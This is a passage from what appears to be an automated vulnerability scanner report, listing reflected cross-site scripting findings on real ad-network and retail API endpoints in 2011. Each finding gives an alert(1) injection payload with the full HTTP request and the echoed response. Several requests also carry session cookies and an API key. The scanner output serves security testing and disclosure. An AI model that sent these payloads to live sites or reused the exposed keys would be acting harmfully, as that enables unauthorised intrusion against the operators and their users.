Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102149616&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=36OwoKhw1oP

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:35:14 GMT
Expires: Thu, 11 Aug 2011 22:35:14 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=36OwoKhw1oP; Domain=.lucidmedia.com; Expires=Fri, 10-Aug-2012 22:35:14 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=731428a';alert(1)//b1769215d63&external_user_id=3574436734868397339"/>');

1.155. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24449'%3balert(1)//0713bdddb9d was submitted in the admeld_callback parameter. This input was echoed as 24449';alert(1)//0713bdddb9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match24449'%3balert(1)//0713bdddb9d HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102149616&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=36OwoKhw1oP

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:35:17 GMT
Expires: Thu, 11 Aug 2011 22:35:17 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=36OwoKhw1oP; Domain=.lucidmedia.com; Expires=Fri, 10-Aug-2012 22:35:17 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match24449';alert(1)//0713bdddb9d?admeld_adprovider_id=73&external_user_id=3574436734868397339"/>');

1.156. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 55836<script>alert(1)</script>67f7e0a0ca5 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5&source=js&ord=2653272 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 31 Aug 2011 17:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca50=uid=29247451; expires=Thu, 01-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca5=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4260&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 31 Aug 2011 17:54:41 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.us/link.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.157. http://api.active.com/REST/ZipDma/zip/75244 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.active.com
Path:   /REST/ZipDma/zip/75244

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>76faf0c8b84 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /REST/ZipDma/zip/75244?output=json&callback=OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84 HTTP/1.1
Host: api.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643; geozip=75244

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/json; charset=utf-8
Content-Length: 172

OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84({"ZipCode":"75244","Latitude":"32.9366","Longitude":"-96.83800","DmaName":"Dallas - Fort Worth"});

1.158. http://api.active.com/REST/geotargeting/handler.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.active.com
Path:   /REST/geotargeting/handler.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9953f<script>alert(1)</script>8b150904b00 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /REST/geotargeting/handler.ashx?output=json&callback=OX.AJAST.__callbacks__.callback19953f<script>alert(1)</script>8b150904b00 HTTP/1.1
Host: api.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 248

OX.AJAST.__callbacks__.callback19953f<script>alert(1)</script>8b150904b00({
"location": {
"zip": "75244",
"city": "DALLAS",
"region": "TEXAS",
"country": "US",
"latitude": "32.7961",
"longitude": "-96.8024"
}
})

1.159. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41be8<script>alert(1)</script>a2b3fb1c730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "c249f30611bc95d631a0e432ffe6fe95"
X-Runtime: 1
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:29 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku>
...[SNIP]...

1.160. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c0e2<script>alert(1)</script>a5010c4844b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%225c0e2<script>alert(1)</script>a5010c4844b&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "87206ffb76a3962125256ec1d025e43c"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:31 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"5c0e2<script>alert(1)</script>a5010c4844b&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

1.161. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a72bd<script>alert(1)</script>f8c76327bfb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATICa72bd<script>alert(1)</script>f8c76327bfb&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "ea0512bd5b72bf72e903baee31b4adcc"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Thu, 11 Aug 2011 23:47:19 GMT

SDSTATICa72bd<script>alert(1)</script>f8c76327bfb({
"queryTime": "0.007",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...

1.162. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 286a6<script>alert(1)</script>220fe19ac5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&286a6<script>alert(1)</script>220fe19ac5d=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "d819595c8f6b5189ddd1afee9b4ff855"
X-Runtime: 5
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Thu, 11 Aug 2011 23:47:27 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&286a6<script>alert(1)</script>220fe19ac5d=1'",
"status": "400 Bad Request"
}
})

1.163. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [pageSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload 33863<script>alert(1)</script>d7fd7ee2f10 was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

